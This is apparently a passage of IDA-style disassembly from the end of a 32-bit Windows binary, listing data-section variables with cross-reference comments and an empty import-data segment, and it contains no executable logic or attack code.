dword_4A297C dd 0 ; DATA XREF: sub_498333+D4�r
; sub_498494+128�w ...
dword_4A2980 dd 0 ; DATA XREF: sub_498333+F0�r
; sub_498333+10C�r ...
dword_4A2984 dd 0 ; DATA XREF: sub_498333+11E�r
; sub_498333+135�r ...
dword_4A2988 dd 0 ; DATA XREF: sub_498333+3F�r
; sub_498494+1B2�w ...
dword_4A298C dd 0 ; DATA XREF: sub_498333+5D�r
; sub_498494+1E0�w ...
dword_4A2990 dd 0 ; DATA XREF: sub_498333+13D�r
; sub_498494+20E�w ...
dword_4A2994 dd 0 ; DATA XREF: sub_498333+1E�r
; sub_498494+23C�w ...
dword_4A2998 dd 0 ; DATA XREF: sub_498333+C2�r
; sub_498333+FF�r ...
dword_4A299C dd 0 ; DATA XREF: sub_498333+6B�r
; sub_498494+298�w ...
dword_4A29A0 dd 20h dup(0) ; DATA XREF: sub_498333+CF�o
; sub_498494+45�o ...
dword_4A2A20 dd 0 ; DATA XREF: sub_499892+27�w
; sub_499892+32�r
align 8
dword_4A2A28 dd 77FC5860h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_48E2E0+3A8�o
; sub_49948C+6�o ...
byte_4A2A40 db 0 ; DATA XREF: sub_499892+7�r
; sub_499892+15�r ...
align 4
dword_4A2A44 dd 8D0000h ; DATA XREF: sub_499397+4�r
; sub_499397+22�w ...
dword_4A2A48 dd 46Fh dup(0) ; DATA XREF: sub_49948C+11�o
; sub_4994F7+5�o
dword_4A3C04 dd 0B91h dup(0) ; CODE XREF: _5:0049F2F8�j
dword_4A6A48 dd 0 ; DATA XREF: sub_499892+7C�r
; sub_499892+82�w ...
align 10h
dword_4A6A50 dd 0 ; DATA XREF: sub_48D15E+25�r
; sub_48D15E+4A�r ...
dword_4A6A54 dd 0 ; DATA XREF: sub_48D216+23�r
; sub_48D216+2B�r ...
dword_4A6A58 dd 2 dup(0) ; DATA XREF: sub_48D3F3+32�o
dword_4A6A60 dd 0 ; DATA XREF: sub_48D271+2C�w
; sub_48D271+57�o
align 8
dword_4A6A68 dd 0 ; DATA XREF: sub_48D271+36�w
dd 2 dup(0)
dword_4A6A74 dd 0 ; DATA XREF: sub_48D271+52�w
dd 4 dup(0)
dword_4A6A88 dd 0 ; DATA XREF: sub_48D271+40�w
align 10h
dword_4A6A90 dd 0ECh dup(0) ; DATA XREF: sub_499EF3+28�o
; sub_499EF3+42�o ...
byte_4A6E40 db 0 ; DATA XREF: sub_49A0EF+71�w
; sub_49A0EF+8F�r
byte_4A6E41 db 0 ; DATA XREF: sub_49A0EF+7B�w
byte_4A6E42 db 0 ; DATA XREF: sub_49A0EF+85�w
align 4
dd 13h dup(0)
dword_4A6E90 dd 42h dup(0) ; DATA XREF: sub_49A0EF+B�o
; sub_49A0EF+17�o ...
dword_4A6F98 dd 40h dup(0) ; DATA XREF: sub_49A638+AB�o
; sub_49A71C+5D�o
dword_4A7098 dd 77FC5A00h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_49A638+25�o
; sub_49A696�o ...
dword_4A70B0 dd 0 ; DATA XREF: sub_49A638+34�r
; sub_49A638+4E�w ...
align 8
dword_4A70B8 dd 77FC59E0h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_49ADD4+6�o
; sub_49B0C8+25�o
byte_4A70D0 db 0 ; DATA XREF: sub_49AC54:loc_49AC64�r
; sub_49B0C8+30�w
align 4
dword_4A70D4 dd 8D2110h ; DATA XREF: sub_4963D0+D�r
; sub_4963D0+26�r ...
dword_4A70D8 dd 8D2358h ; DATA XREF: sub_4960D0+264�r
; sub_49ADD4+72�w ...
dword_4A70DC dd 0 ; DATA XREF: sub_48E2E0+3FD�w
dword_4A70E0 dd 0 ; DATA XREF: sub_49C677+2F�w
; sub_49C677+47�r
byte_4A70E4 db 0 ; DATA XREF: sub_49C677+4�r
; sub_49C677+12�r ...
align 4
dword_4A70E8 dd 0 ; DATA XREF: sub_48DA80+28�r
; sub_48DA80+4C�w ...
dd 2 dup(0)
dword_4A70F4 dd 0 ; DATA XREF: sub_48D86E+4�r
; sub_48D86E+9D�r ...
dd 3 dup(0)
dword_4A7104 dd 0 ; DATA XREF: sub_48DA80+C0�r
; sub_48DDBF+A6�r
dd 0
dword_4A710C dd 0 ; DATA XREF: sub_48DDBF+26�r
; sub_48DDBF:loc_48DE29�w
_6 ends
; Section 8. (virtual address 000A8000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 000A7200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 4A8000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start